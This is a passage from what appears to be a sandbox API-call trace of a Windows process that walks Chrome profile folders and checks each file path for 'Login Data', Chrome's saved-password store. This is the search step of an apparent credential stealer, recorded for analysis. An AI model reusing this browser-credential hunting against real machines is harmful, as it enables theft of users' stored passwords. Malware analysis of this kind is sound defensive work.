[0161.691] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925dd8 | out: hHeap=0x8e0000) returned 1 [0161.691] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8655f830, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x8655f830, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x8655f830, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="et", cAlternateFileName="")) returned 1 [0161.691] lstrcmpiW (lpString1="et", lpString2=".") returned 1 [0161.691] lstrcmpiW (lpString1="et", lpString2="..") returned 1 [0161.691] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned 134 [0161.691] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned 134 [0161.691] lstrlenW (lpString="\\") returned 1 [0161.691] GetProcessHeap () returned 0x8e0000 [0161.691] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x110) returned 0x925cc0 [0161.691] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales" [0161.691] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\" [0161.691] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\") returned 135 [0161.691] lstrlenW (lpString="et") returned 2 [0161.691] GetProcessHeap () returned 0x8e0000 [0161.691] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x114) returned 0x925dd8 [0161.691] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\" [0161.691] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\", lpString2="et" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et" [0161.691] VirtualQuery (in: lpAddress=0x925cc0, lpBuffer=0x2de928, dwLength=0x1c | out: lpBuffer=0x2de928*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.691] GetProcessHeap () returned 0x8e0000 [0161.691] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925cc0 | out: hHeap=0x8e0000) returned 1 [0161.691] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et") returned 137 [0161.691] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et") returned 137 [0161.691] lstrlenW (lpString="\\*.*") returned 4 [0161.691] GetProcessHeap () returned 0x8e0000 [0161.691] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x11c) returned 0x91a0a8 [0161.691] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et" [0161.692] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et\\*.*" [0161.692] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et\\*.*", lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8655f830, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x8655f830, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x8655f830, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName=".", cAlternateFileName="")) returned 0x8f9c00 [0161.692] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.692] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8655f830, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x8655f830, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x8655f830, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="..", cAlternateFileName="")) returned 1 [0161.692] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.692] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.692] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8655f830, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x8655e890, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86833250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xd8, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0161.693] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et") returned 137 [0161.693] lstrlenW (lpString="\\") returned 1 [0161.693] GetProcessHeap () returned 0x8e0000 [0161.693] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x116) returned 0x91b1d8 [0161.693] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et" [0161.693] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et\\" [0161.693] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et\\") returned 138 [0161.693] lstrlenW (lpString="messages.json") returned 13 [0161.693] GetProcessHeap () returned 0x8e0000 [0161.693] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x130) returned 0x91b2f8 [0161.693] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et\\" [0161.693] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et\\", lpString2="messages.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et\\messages.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et\\messages.json" [0161.693] VirtualQuery (in: lpAddress=0x91b1d8, lpBuffer=0x2de6b0, dwLength=0x1c | out: lpBuffer=0x2de6b0*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.693] GetProcessHeap () returned 0x8e0000 [0161.693] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b1d8 | out: hHeap=0x8e0000) returned 1 [0161.693] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et\\messages.json", lpSrch="Login Data") returned 0x0 [0161.693] VirtualQuery (in: lpAddress=0x91b2f8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.693] GetProcessHeap () returned 0x8e0000 [0161.693] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b2f8 | out: hHeap=0x8e0000) returned 1 [0161.693] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8655f830, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x8655e890, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86833250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xd8, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0161.693] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0161.693] VirtualQuery (in: lpAddress=0x91a0a8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91a000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.693] GetProcessHeap () returned 0x8e0000 [0161.693] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91a0a8 | out: hHeap=0x8e0000) returned 1 [0161.693] VirtualQuery (in: lpAddress=0x925dd8, lpBuffer=0x2de934, dwLength=0x1c | out: lpBuffer=0x2de934*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.693] GetProcessHeap () returned 0x8e0000 [0161.693] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925dd8 | out: hHeap=0x8e0000) returned 1 [0161.693] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8655f830, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x8655f830, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x8655f830, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="fi", cAlternateFileName="")) returned 1 [0161.693] lstrcmpiW (lpString1="fi", lpString2=".") returned 1 [0161.693] lstrcmpiW (lpString1="fi", lpString2="..") returned 1 [0161.693] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned 134 [0161.693] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned 134 [0161.694] lstrlenW (lpString="\\") returned 1 [0161.694] GetProcessHeap () returned 0x8e0000 [0161.694] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x110) returned 0x925cc0 [0161.694] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales" [0161.694] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\" [0161.694] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\") returned 135 [0161.694] lstrlenW (lpString="fi") returned 2 [0161.694] GetProcessHeap () returned 0x8e0000 [0161.694] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x114) returned 0x925dd8 [0161.694] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\" [0161.694] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\", lpString2="fi" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi" [0161.694] VirtualQuery (in: lpAddress=0x925cc0, lpBuffer=0x2de928, dwLength=0x1c | out: lpBuffer=0x2de928*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.694] GetProcessHeap () returned 0x8e0000 [0161.694] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925cc0 | out: hHeap=0x8e0000) returned 1 [0161.694] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi") returned 137 [0161.694] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi") returned 137 [0161.694] lstrlenW (lpString="\\*.*") returned 4 [0161.694] GetProcessHeap () returned 0x8e0000 [0161.694] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x11c) returned 0x91a0a8 [0161.694] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi" [0161.694] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi\\*.*" [0161.694] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi\\*.*", lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8655f830, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x8655f830, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x8655f830, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName=".", cAlternateFileName="")) returned 0x8f9c00 [0161.694] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.694] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8655f830, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x8655f830, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x8655f830, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="..", cAlternateFileName="")) returned 1 [0161.694] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.694] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.694] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8655f830, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x8655e890, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86833250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xd8, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0161.694] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi") returned 137 [0161.695] lstrlenW (lpString="\\") returned 1 [0161.695] GetProcessHeap () returned 0x8e0000 [0161.695] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x116) returned 0x91b1d8 [0161.695] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi" [0161.695] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi\\" [0161.695] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi\\") returned 138 [0161.695] lstrlenW (lpString="messages.json") returned 13 [0161.695] GetProcessHeap () returned 0x8e0000 [0161.695] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x130) returned 0x91b2f8 [0161.695] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi\\" [0161.695] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi\\", lpString2="messages.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi\\messages.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi\\messages.json" [0161.695] VirtualQuery (in: lpAddress=0x91b1d8, lpBuffer=0x2de6b0, dwLength=0x1c | out: lpBuffer=0x2de6b0*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.695] GetProcessHeap () returned 0x8e0000 [0161.695] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b1d8 | out: hHeap=0x8e0000) returned 1 [0161.695] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi\\messages.json", lpSrch="Login Data") returned 0x0 [0161.695] VirtualQuery (in: lpAddress=0x91b2f8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91b000, AllocationBase=0x8e0000, 